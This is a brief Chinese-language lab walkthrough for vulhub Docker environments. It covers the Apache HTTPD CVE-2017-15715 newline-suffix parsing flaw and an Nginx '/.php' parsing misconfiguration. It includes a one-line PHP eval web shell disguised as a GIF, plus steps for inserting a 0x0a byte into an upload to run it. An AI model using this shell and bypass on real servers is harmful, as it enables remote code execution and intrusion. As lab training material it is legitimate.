=== shell
此环境来自vulhub工程:
https://github.com/vulhub/vulhub
以下测试环境为ubuntu 20.04
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,xxx.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
# 拉取vulhub配置
git clone https://github.com/vulhub/vulhub.git
# 切换到相应漏洞路径
cd xxx/vulhub-master/httpd/CVE-2017-15715
# docker-compose部署该漏洞环境
docker-compose up -d
访问http://ip:8080/,只有一个文件上传框,直接上传一句话木马
GIF89a<?=eval($_POST["root"]);?>
然后抓包
打开hex表,找到shell.php哪一行,右键0d选择插入byte
写入0a,然后确定
访问shell.php%0a,确认是否能解析
该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞,在上传图片路径后加上/.php就会当成php解析
# 开之前记得关80端口服务,不然可能会出现端口占用的问题
cd nginx/nginx_parsing_vulnerability/
# docker启动
docker-compose up -d
上传一张图片马,根据图片路径访问http://your-ip/uploadfiles/23c6161c5b4dafe8becc8e29452f00b2.jpg/.php